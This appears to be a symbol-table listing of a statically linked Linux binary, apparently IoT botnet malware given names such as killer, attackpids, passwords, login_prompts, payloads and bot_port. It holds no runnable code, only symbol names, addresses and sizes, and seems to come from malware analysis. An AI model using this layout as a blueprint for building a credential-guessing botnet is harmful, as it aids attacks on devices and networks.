              __GI_strspn.symtab0x80517e442FUNC<unknown>HIDDEN2
              __GI_strtok.symtab0x804d7f822FUNC<unknown>HIDDEN2
              __GI_strtok_r.symtab0x805181080FUNC<unknown>HIDDEN2
              __GI_strtol.symtab0x804eb6423FUNC<unknown>HIDDEN2
              __GI_sysconf.symtab0x804edb8523FUNC<unknown>HIDDEN2
              __GI_tcgetattr.symtab0x804d82c96FUNC<unknown>HIDDEN2
              __GI_time.symtab0x804c25c16FUNC<unknown>HIDDEN2
              __GI_times.symtab0x804fd0c16FUNC<unknown>HIDDEN2
              __GI_vsnprintf.symtab0x804c5f8172FUNC<unknown>HIDDEN2
              __GI_wcrtomb.symtab0x805019463FUNC<unknown>HIDDEN2
              __GI_wcsnrtombs.symtab0x80501f0128FUNC<unknown>HIDDEN2
              __GI_wcsrtombs.symtab0x80501d427FUNC<unknown>HIDDEN2
              __GI_write.symtab0x804f49091FUNC<unknown>HIDDEN2
              __JCR_END__.symtab0x805761c0OBJECT<unknown>DEFAULT9
              __JCR_LIST__.symtab0x805761c0OBJECT<unknown>DEFAULT9
              __app_fini.symtab0x805a4344OBJECT<unknown>HIDDEN12
              __atexit_lock.symtab0x8057d2c24OBJECT<unknown>DEFAULT11
              __bss_start.symtab0x8057d600NOTYPE<unknown>DEFAULTSHN_ABS
              __check_one_fd.symtab0x804f65b44FUNC<unknown>DEFAULT2
              __close.symtab0x804f3e080FUNC<unknown>DEFAULT2
              __close_nocancel.symtab0x804f3ea27FUNC<unknown>DEFAULT2
              __ctype_b.symtab0x8057d544OBJECT<unknown>DEFAULT11
              __ctype_tolower.symtab0x8057d5c4OBJECT<unknown>DEFAULT11
              __curbrk.symtab0x805a9784OBJECT<unknown>HIDDEN12
              __deregister_frame_info_bases.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              __do_global_ctors_aux.symtab0x80523a00FUNC<unknown>DEFAULT2
              __do_global_dtors_aux.symtab0x80480e00FUNC<unknown>DEFAULT2
              __dso_handle.symtab0x80576400OBJECT<unknown>HIDDEN11
              __environ.symtab0x805a42c4OBJECT<unknown>DEFAULT12
              __errno_location.symtab0x804c4e813FUNC<unknown>DEFAULT2
              __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __exit_cleanup.symtab0x8059edc4OBJECT<unknown>HIDDEN12
              __fcntl_nocancel.symtab0x804bfdc83FUNC<unknown>DEFAULT2
              __fgetc_unlocked.symtab0x8051554204FUNC<unknown>DEFAULT2
              __fini_array_end.symtab0x805760c0NOTYPE<unknown>HIDDEN6
              __fini_array_start.symtab0x805760c0NOTYPE<unknown>HIDDEN6
              __fork.symtab0x804f050524FUNC<unknown>DEFAULT2
              __fork_generation_pointer.symtab0x805b6244OBJECT<unknown>HIDDEN12
              __fork_handlers.symtab0x805b6284OBJECT<unknown>HIDDEN12
              __fork_lock.symtab0x8059ee04OBJECT<unknown>HIDDEN12
              __fputc_unlocked.symtab0x804d45c181FUNC<unknown>DEFAULT2
              __get_pc_thunk_bx.symtab0x80480d00FUNC<unknown>HIDDEN2
              __getdents.symtab0x804fa4c131FUNC<unknown>HIDDEN2
              __getdents64.symtab0x8051f40280FUNC<unknown>HIDDEN2
              __getpagesize.symtab0x804fb0819FUNC<unknown>DEFAULT2
              __getpid.symtab0x804f27c49FUNC<unknown>DEFAULT2
              __glibc_strerror_r.symtab0x804d6c826FUNC<unknown>DEFAULT2
              __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              __init_array_end.symtab0x805760c0NOTYPE<unknown>HIDDEN6
              __init_array_start.symtab0x805760c0NOTYPE<unknown>HIDDEN6
              __libc_close.symtab0x804f3e080FUNC<unknown>DEFAULT2
              __libc_connect.symtab0x804d90c84FUNC<unknown>DEFAULT2
              __libc_disable_asynccancel.symtab0x804f54c86FUNC<unknown>HIDDEN2
              __libc_enable_asynccancel.symtab0x804f5a279FUNC<unknown>HIDDEN2
              __libc_errno.symtab0x04TLS<unknown>HIDDEN6
              __libc_fcntl.symtab0x804c02f153FUNC<unknown>DEFAULT2
              __libc_fork.symtab0x804f050524FUNC<unknown>DEFAULT2
              __libc_h_errno.symtab0x44TLS<unknown>HIDDEN6
              __libc_nanosleep.symtab0x804fc2961FUNC<unknown>DEFAULT2
              __libc_open.symtab0x804f43091FUNC<unknown>DEFAULT2
              __libc_read.symtab0x804f4f091FUNC<unknown>DEFAULT2
              __libc_recv.symtab0x804d99892FUNC<unknown>DEFAULT2
              __libc_select.symtab0x804c1ed108FUNC<unknown>DEFAULT2
              __libc_send.symtab0x804d9f492FUNC<unknown>DEFAULT2
              __libc_setup_tls.symtab0x8051c6e513FUNC<unknown>DEFAULT2
              __libc_sigaction.symtab0x804f90f80FUNC<unknown>DEFAULT2
              __libc_stack_end.symtab0x805a4284OBJECT<unknown>DEFAULT12
              __libc_write.symtab0x804f49091FUNC<unknown>DEFAULT2
              __lll_lock_wait_private.symtab0x804f00040FUNC<unknown>HIDDEN2
              __lll_unlock_wake_private.symtab0x804f03032FUNC<unknown>HIDDEN2
              __malloc_consolidate.symtab0x804e3f9379FUNC<unknown>HIDDEN2
              __malloc_largebin_index.symtab0x804dae038FUNC<unknown>DEFAULT2
              __malloc_lock.symtab0x8057c5024OBJECT<unknown>DEFAULT11
              __malloc_state.symtab0x805b2ac888OBJECT<unknown>DEFAULT12
              __malloc_trim.symtab0x804e37c125FUNC<unknown>DEFAULT2
              __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              __open.symtab0x804f43091FUNC<unknown>DEFAULT2
              __open_nocancel.symtab0x804f43a33FUNC<unknown>DEFAULT2
              __pagesize.symtab0x805a4304OBJECT<unknown>DEFAULT12
              __preinit_array_end.symtab0x805760c0NOTYPE<unknown>HIDDEN6
              __preinit_array_start.symtab0x805760c0NOTYPE<unknown>HIDDEN6
              __progname.symtab0x8057d484OBJECT<unknown>DEFAULT11
              __progname_full.symtab0x8057d4c4OBJECT<unknown>DEFAULT11
              __pthread_initialize_minimal.symtab0x8051e6f15FUNC<unknown>DEFAULT2
              __pthread_mutex_init.symtab0x804f5f73FUNC<unknown>DEFAULT2
              __pthread_mutex_lock.symtab0x804f5f43FUNC<unknown>DEFAULT2
              __pthread_mutex_trylock.symtab0x804f5f43FUNC<unknown>DEFAULT2
              __pthread_mutex_unlock.symtab0x804f5f43FUNC<unknown>DEFAULT2
              __pthread_return_0.symtab0x804f5f43FUNC<unknown>DEFAULT2
              __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              __read.symtab0x804f4f091FUNC<unknown>DEFAULT2
              __read_nocancel.symtab0x804f4fa33FUNC<unknown>DEFAULT2
              __register_frame_info_bases.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              __restore.symtab0x804f9070NOTYPE<unknown>DEFAULT2
              __restore_rt.symtab0x804f9000NOTYPE<unknown>DEFAULT2
              __rtld_fini.symtab0x805a4384OBJECT<unknown>HIDDEN12
              __socketcall.symtab0x804f9a043FUNC<unknown>HIDDEN2
              __socketcall.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __stdin.symtab0x8057b704OBJECT<unknown>DEFAULT11
              __stdio_READ.symtab0x805218062FUNC<unknown>HIDDEN2
              __stdio_WRITE.symtab0x805045c139FUNC<unknown>HIDDEN2
              __stdio_adjust_position.symtab0x80521c0154FUNC<unknown>HIDDEN2
              __stdio_fwrite.symtab0x80507bc232FUNC<unknown>HIDDEN2
              __stdio_rfill.symtab0x805225c37FUNC<unknown>HIDDEN2
              __stdio_seek.symtab0x80522e046FUNC<unknown>HIDDEN2
              __stdio_trans2r_o.symtab0x805228492FUNC<unknown>HIDDEN2
              __stdio_trans2w_o.symtab0x80508a4154FUNC<unknown>HIDDEN2
              __stdio_wcommit.symtab0x804c7b037FUNC<unknown>HIDDEN2
              __stdout.symtab0x8057b744OBJECT<unknown>DEFAULT11
              __syscall_error.symtab0x804f8f015FUNC<unknown>HIDDEN2
              __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __syscall_nanosleep.symtab0x804fc0041FUNC<unknown>DEFAULT2
              __syscall_rt_sigaction.symtab0x804f9cc53FUNC<unknown>DEFAULT2
              __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __syscall_select.symtab0x804c1b457FUNC<unknown>DEFAULT2
              __sysv_signal.symtab0x804da78103FUNC<unknown>DEFAULT2
              __uClibc_fini.symtab0x804f62356FUNC<unknown>DEFAULT2
              __uClibc_init.symtab0x804f68739FUNC<unknown>DEFAULT2
              __uClibc_main.symtab0x804f6ae577FUNC<unknown>DEFAULT2
              __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __uclibc_progname.symtab0x8057d444OBJECT<unknown>HIDDEN11
              __write.symtab0x804f49091FUNC<unknown>DEFAULT2
              __write_nocancel.symtab0x804f49a33FUNC<unknown>DEFAULT2
              __xpg_strerror_r.symtab0x804d6e4191FUNC<unknown>DEFAULT2
              __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __xstat32_conv.symtab0x804fdbf138FUNC<unknown>HIDDEN2
              __xstat64_conv.symtab0x804fd1c163FUNC<unknown>HIDDEN2
              _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _bss_custom_printf_spec.symtab0x8059eb810OBJECT<unknown>DEFAULT12
              _charpad.symtab0x804c7d853FUNC<unknown>DEFAULT2
              _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _custom_printf_arginfo.symtab0x805b25c40OBJECT<unknown>HIDDEN12
              _custom_printf_handler.symtab0x805b28440OBJECT<unknown>HIDDEN12
              _custom_printf_spec.symtab0x8057c4c4OBJECT<unknown>HIDDEN11
              _dl_aux_init.symtab0x8051e8018FUNC<unknown>DEFAULT2
              _dl_nothread_init_static_tls.symtab0x8051e9268FUNC<unknown>HIDDEN2
              _dl_phdr.symtab0x805b64c4OBJECT<unknown>DEFAULT12
              _dl_phnum.symtab0x805b6504OBJECT<unknown>DEFAULT12
              _dl_tls_dtv_gaps.symtab0x805b6401OBJECT<unknown>DEFAULT12
              _dl_tls_dtv_slotinfo_list.symtab0x805b63c4OBJECT<unknown>DEFAULT12
              _dl_tls_generation.symtab0x805b6444OBJECT<unknown>DEFAULT12
              _dl_tls_max_dtv_idx.symtab0x805b6344OBJECT<unknown>DEFAULT12
              _dl_tls_setup.symtab0x8051c3e48FUNC<unknown>DEFAULT2
              _dl_tls_static_align.symtab0x805b6304OBJECT<unknown>DEFAULT12
              _dl_tls_static_nelem.symtab0x805b6484OBJECT<unknown>DEFAULT12
              _dl_tls_static_size.symtab0x805b6384OBJECT<unknown>DEFAULT12
              _dl_tls_static_used.symtab0x805b62c4OBJECT<unknown>DEFAULT12
              _edata.symtab0x8057d600NOTYPE<unknown>DEFAULTSHN_ABS
              _end.symtab0x805b6540NOTYPE<unknown>DEFAULTSHN_ABS
              _exit.symtab0x804c0c866FUNC<unknown>DEFAULT2
              _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _fini.symtab0x80523c70FUNC<unknown>DEFAULT3
              _fixed_buffers.symtab0x8057eb88192OBJECT<unknown>DEFAULT12
              _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _fp_out_narrow.symtab0x804c80d94FUNC<unknown>DEFAULT2
              _fpmaxtostr.symtab0x8050abc1479FUNC<unknown>HIDDEN2
              _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _init.symtab0x80480b40FUNC<unknown>DEFAULT1
              _load_inttype.symtab0x805094086FUNC<unknown>HIDDEN2
              _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _ppfs_init.symtab0x804ce68103FUNC<unknown>HIDDEN2
              _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _ppfs_parsespec.symtab0x804d04d1036FUNC<unknown>HIDDEN2
              _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _ppfs_prepargs.symtab0x804ced057FUNC<unknown>HIDDEN2
              _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _ppfs_setargs.symtab0x804cf0c277FUNC<unknown>HIDDEN2
              _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _promoted_size.symtab0x804d02441FUNC<unknown>DEFAULT2
              _pthread_cleanup_pop_restore.symtab0x804f60c23FUNC<unknown>DEFAULT2
              _pthread_cleanup_push_defer.symtab0x804f5fa18FUNC<unknown>DEFAULT2
              _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _setjmp.symtab0x804f96034FUNC<unknown>DEFAULT2
              _start.symtab0x804818434FUNC<unknown>DEFAULT2
              _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _stdio_fopen.symtab0x80504e8664FUNC<unknown>HIDDEN2
              _stdio_init.symtab0x804c6a459FUNC<unknown>HIDDEN2
              _stdio_openlist.symtab0x8057b784OBJECT<unknown>DEFAULT11
              _stdio_openlist_add_lock.symtab0x8057e9812OBJECT<unknown>DEFAULT12
              _stdio_openlist_dec_use.symtab0x80511b8320FUNC<unknown>HIDDEN2
              _stdio_openlist_del_count.symtab0x8057eb44OBJECT<unknown>DEFAULT12
              _stdio_openlist_del_lock.symtab0x8057ea412OBJECT<unknown>DEFAULT12
              _stdio_openlist_use_count.symtab0x8057eb04OBJECT<unknown>DEFAULT12
              _stdio_streams.symtab0x8057b80204OBJECT<unknown>DEFAULT11
              _stdio_term.symtab0x804c6df208FUNC<unknown>HIDDEN2
              _stdio_user_locking.symtab0x8057b7c4OBJECT<unknown>DEFAULT11
              _stdlib_strto_l.symtab0x804eb7c278FUNC<unknown>HIDDEN2
              _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _store_inttype.symtab0x805099861FUNC<unknown>HIDDEN2
              _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _string_syserrmsgs.symtab0x80558002906OBJECT<unknown>HIDDEN4
              _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _uintmaxtostr.symtab0x80509d8228FUNC<unknown>HIDDEN2
              _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _vfprintf_internal.symtab0x804c86b1530FUNC<unknown>HIDDEN2
              _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              abort.symtab0x804e720191FUNC<unknown>DEFAULT2
              abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              arm7lol.symtab0x8057ab48OBJECT<unknown>DEFAULT11
              atoi.symtab0x804eb5017FUNC<unknown>DEFAULT2
              atol.symtab0x804eb5017FUNC<unknown>DEFAULT2
              atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              attackpids.symtab0x805abe04OBJECT<unknown>DEFAULT12
              been_there_done_that.symtab0x8059ed81OBJECT<unknown>DEFAULT12
              bot_port.symtab0x80578744OBJECT<unknown>DEFAULT11
              brk.symtab0x8051ed844FUNC<unknown>DEFAULT2
              brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              buf.symtab0x805ae401024OBJECT<unknown>DEFAULT12
              buf.4562.symtab0x8059ec816OBJECT<unknown>DEFAULT12
              calloc.symtab0x804e290236FUNC<unknown>DEFAULT2
              calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              check_realpathHAXs.symtab0x8048580266FUNC<unknown>DEFAULT2
              clock.symtab0x804c4f834FUNC<unknown>DEFAULT2
              clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              close.symtab0x804f3e080FUNC<unknown>DEFAULT2
              closedir.symtab0x804c26c130FUNC<unknown>DEFAULT2
              closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              cmdlinekillstrings.symtab0x805775824OBJECT<unknown>DEFAULT11
              cmdparse.symtab0x8049120236FUNC<unknown>DEFAULT2
              commandparsing.symtab0x8049210155FUNC<unknown>DEFAULT2
              compare_strings.symtab0x80495e0150FUNC<unknown>DEFAULT2
              completed.4963.symtab0x8057d601OBJECT<unknown>DEFAULT12
              connect.symtab0x804d90c84FUNC<unknown>DEFAULT2
              connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              connectTries.symtab0x80578984OBJECT<unknown>DEFAULT11
              connecthosts.symtab0x80578788OBJECT<unknown>DEFAULT11
              connecting.symtab0x80492b0628FUNC<unknown>DEFAULT2
              crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              dec_buf.symtab0x805ac20512OBJECT<unknown>DEFAULT12
              decrypt.symtab0x80481e038FUNC<unknown>DEFAULT2
              dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              dstring.symtab0x805ae2030OBJECT<unknown>DEFAULT12
              elf_response.symtab0x80579d08OBJECT<unknown>DEFAULT11
              enc.symtab0x80481b038FUNC<unknown>DEFAULT2
              enc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              environ.symtab0x805a42c4OBJECT<unknown>DEFAULT12
              errno.symtab0x04TLS<unknown>DEFAULT6
              errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              estring.symtab0x805abe830OBJECT<unknown>DEFAULT12
              execmsg.symtab0x8057aa812OBJECT<unknown>DEFAULT11
              exit.symtab0x804ec9493FUNC<unknown>DEFAULT2
              exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              exp10_table.symtab0x8056da0156OBJECT<unknown>DEFAULT4
              fail_or_success.symtab0x8057a4052OBJECT<unknown>DEFAULT11
              fail_prompts.symtab0x8057a0036OBJECT<unknown>DEFAULT11
              fclose.symtab0x8050270380FUNC<unknown>DEFAULT2
              fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fcntl.symtab0x804c02f153FUNC<unknown>DEFAULT2
              fd_to_DIR.symtab0x804c2f0136FUNC<unknown>DEFAULT2
              fdopendir.symtab0x804c3fc108FUNC<unknown>DEFAULT2
              fflush_unlocked.symtab0x80512f8447FUNC<unknown>DEFAULT2
              fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fgetc.symtab0x8051084145FUNC<unknown>DEFAULT2
              fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fgetc_unlocked.symtab0x8051554204FUNC<unknown>DEFAULT2
              fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fgets.symtab0x805112c118FUNC<unknown>DEFAULT2
              fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fgets_unlocked.symtab0x805162094FUNC<unknown>DEFAULT2
              fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fmt.symtab0x8056d8020OBJECT<unknown>DEFAULT4
              fopen.symtab0x805044421FUNC<unknown>DEFAULT2
              fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fork.symtab0x804f050524FUNC<unknown>DEFAULT2
              fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fork_handler_pool.symtab0x8059ee41348OBJECT<unknown>DEFAULT12
              fputc_unlocked.symtab0x804d45c181FUNC<unknown>DEFAULT2
              fputc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fputs_unlocked.symtab0x804d51445FUNC<unknown>DEFAULT2
              fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              frame_dummy.symtab0x80481300FUNC<unknown>DEFAULT2
              free.symtab0x804e574399FUNC<unknown>DEFAULT2
              free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fseek.symtab0x805205824FUNC<unknown>DEFAULT2
              fseeko.symtab0x805205824FUNC<unknown>DEFAULT2
              fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fseeko64.symtab0x8052070246FUNC<unknown>DEFAULT2
              fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fstat.symtab0x804fa0470FUNC<unknown>DEFAULT2
              fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              fwrite_unlocked.symtab0x804d544111FUNC<unknown>DEFAULT2
              fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              get_cmdline.symtab0x8048a20281FUNC<unknown>DEFAULT2
              getc.symtab0x8051084145FUNC<unknown>DEFAULT2
              getc_unlocked.symtab0x8051554204FUNC<unknown>DEFAULT2
              getdents.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getdtablesize.symtab0x804fad032FUNC<unknown>DEFAULT2
              getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getegid.symtab0x804faf08FUNC<unknown>DEFAULT2
              getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              geteuid.symtab0x804faf88FUNC<unknown>DEFAULT2
              geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getgid.symtab0x804fb008FUNC<unknown>DEFAULT2
              getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getpagesize.symtab0x804fb0819FUNC<unknown>DEFAULT2
              getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getpid.symtab0x804f27c49FUNC<unknown>DEFAULT2
              getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getppid.symtab0x804c10c8FUNC<unknown>DEFAULT2
              getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getrlimit.symtab0x804fb1c43FUNC<unknown>DEFAULT2
              getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getsockopt.symtab0x804d96056FUNC<unknown>DEFAULT2
              getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              getuid.symtab0x804c1148FUNC<unknown>DEFAULT2
              getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              h_errno.symtab0x44TLS<unknown>DEFAULT6
              http.symtab0x805b24020OBJECT<unknown>DEFAULT12
              http_arg.symtab0x80578805OBJECT<unknown>DEFAULT11
              index.symtab0x80516a830FUNC<unknown>DEFAULT2
              inet_addr.symtab0x804d8ec31FUNC<unknown>DEFAULT2
              inet_aton.symtab0x8051884148FUNC<unknown>DEFAULT2
              inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              inet_ntoa.symtab0x804d8d817FUNC<unknown>DEFAULT2
              inet_ntoa.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              inet_ntoa_r.symtab0x804d88c76FUNC<unknown>DEFAULT2
              init_static_tls.symtab0x8051c1442FUNC<unknown>DEFAULT2
              initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              initstate.symtab0x804e88185FUNC<unknown>DEFAULT2
              initstate_r.symtab0x804ea13155FUNC<unknown>DEFAULT2
              ioctl.symtab0x804fb48139FUNC<unknown>DEFAULT2
              ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              isatty.symtab0x804d81027FUNC<unknown>DEFAULT2
              isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              kill.symtab0x804c11c43FUNC<unknown>DEFAULT2
              kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              killer.symtab0x80482d0678FUNC<unknown>DEFAULT2
              killer.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              killer_FDS.symtab0x8048690911FUNC<unknown>DEFAULT2
              killer_cmdlinelol.symtab0x8048b40678FUNC<unknown>DEFAULT2
              killer_init.symtab0x8048df0222FUNC<unknown>DEFAULT2
              killer_pid.symtab0x805ab804OBJECT<unknown>DEFAULT12
              killer_pid2.symtab0x80576484OBJECT<unknown>DEFAULT11
              killer_stop.symtab0x804821073FUNC<unknown>DEFAULT2
              libc-cancellation.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              libc-tls.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              login_prompts.symtab0x80579e032OBJECT<unknown>DEFAULT11
              lseek64.symtab0x805234490FUNC<unknown>DEFAULT2
              main.symtab0x8049530161FUNC<unknown>DEFAULT2
              main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              malloc.symtab0x804db061928FUNC<unknown>DEFAULT2
              malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              malloc_trim.symtab0x804e70329FUNC<unknown>DEFAULT2
              memcpy.symtab0x804d5b441FUNC<unknown>DEFAULT2
              memcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              memmove.symtab0x805168037FUNC<unknown>DEFAULT2
              memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              mempcpy.symtab0x805232430FUNC<unknown>DEFAULT2
              mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              memrchr.symtab0x8051700177FUNC<unknown>DEFAULT2
              memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              memset.symtab0x804d5e050FUNC<unknown>DEFAULT2
              memset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              mmap.symtab0x804f98427FUNC<unknown>DEFAULT2
              mremap.symtab0x8051f0459FUNC<unknown>DEFAULT2
              mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              munmap.symtab0x804fbd443FUNC<unknown>DEFAULT2
              munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              mylock.symtab0x8057c6824OBJECT<unknown>DEFAULT11
              mylock.symtab0x8057c8024OBJECT<unknown>DEFAULT11
              nanosleep.symtab0x804fc2961FUNC<unknown>DEFAULT2
              nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              next_start.1451.symtab0x8059ec44OBJECT<unknown>DEFAULT12
              nextip.symtab0x8057e844OBJECT<unknown>DEFAULT12
              nprocessors_onln.symtab0x804ecf4196FUNC<unknown>DEFAULT2
              object.4975.symtab0x8057d6424OBJECT<unknown>DEFAULT12
              open.symtab0x804f43091FUNC<unknown>DEFAULT2
              opendir.symtab0x804c378132FUNC<unknown>DEFAULT2
              opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              ourPid.symtab0x805abcc4OBJECT<unknown>DEFAULT12
              ourPidLen.symtab0x805abc010OBJECT<unknown>DEFAULT12
              p.4961.symtab0x80576440OBJECT<unknown>DEFAULT11
              parse_config.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              passwords.symtab0x8057940144OBJECT<unknown>DEFAULT11
              pathread.symtab0x8048260109FUNC<unknown>DEFAULT2
              payloads.symtab0x8057ae0132OBJECT<unknown>DEFAULT11
              pidPath.symtab0x805a980512OBJECT<unknown>DEFAULT12
              prctl.symtab0x804c14859FUNC<unknown>DEFAULT2
              prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              prefix.6454.symtab0x805575812OBJECT<unknown>DEFAULT4
              print.symtab0x80499b0458FUNC<unknown>DEFAULT2
              printf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              printi.symtab0x8049880297FUNC<unknown>DEFAULT2
              prints.symtab0x8049710367FUNC<unknown>DEFAULT2
              proc_name.symtab0x805788d4OBJECT<unknown>DEFAULT11
              program_invocation_name.symtab0x8057d4c4OBJECT<unknown>DEFAULT11
              program_invocation_short_name.symtab0x8057d484OBJECT<unknown>DEFAULT11
              pseudo_cancel.symtab0x804f4050NOTYPE<unknown>DEFAULT2
              pseudo_cancel.symtab0x804f45b0NOTYPE<unknown>DEFAULT2
              pseudo_cancel.symtab0x804f4bb0NOTYPE<unknown>DEFAULT2
              pseudo_cancel.symtab0x804f51b0NOTYPE<unknown>DEFAULT2
              pseudo_end.symtab0x804f42f0NOTYPE<unknown>DEFAULT2
              pseudo_end.symtab0x804f48a0NOTYPE<unknown>DEFAULT2
              pseudo_end.symtab0x804f4ea0NOTYPE<unknown>DEFAULT2
              pseudo_end.symtab0x804f54a0NOTYPE<unknown>DEFAULT2
              putc_unlocked.symtab0x804d45c181FUNC<unknown>DEFAULT2
              puts.symtab0x804c51c141FUNC<unknown>DEFAULT2
              puts.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              qual_chars.6463.symtab0x805576c20OBJECT<unknown>DEFAULT4
              raise.symtab0x804f2b0100FUNC<unknown>DEFAULT2
              raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              rand.symtab0x804e7e05FUNC<unknown>DEFAULT2
              rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              random.symtab0x804e7e866FUNC<unknown>DEFAULT2
              random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              random_poly_info.symtab0x805635c10OBJECT<unknown>DEFAULT4
              random_r.symtab0x804e91495FUNC<unknown>DEFAULT2
              random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
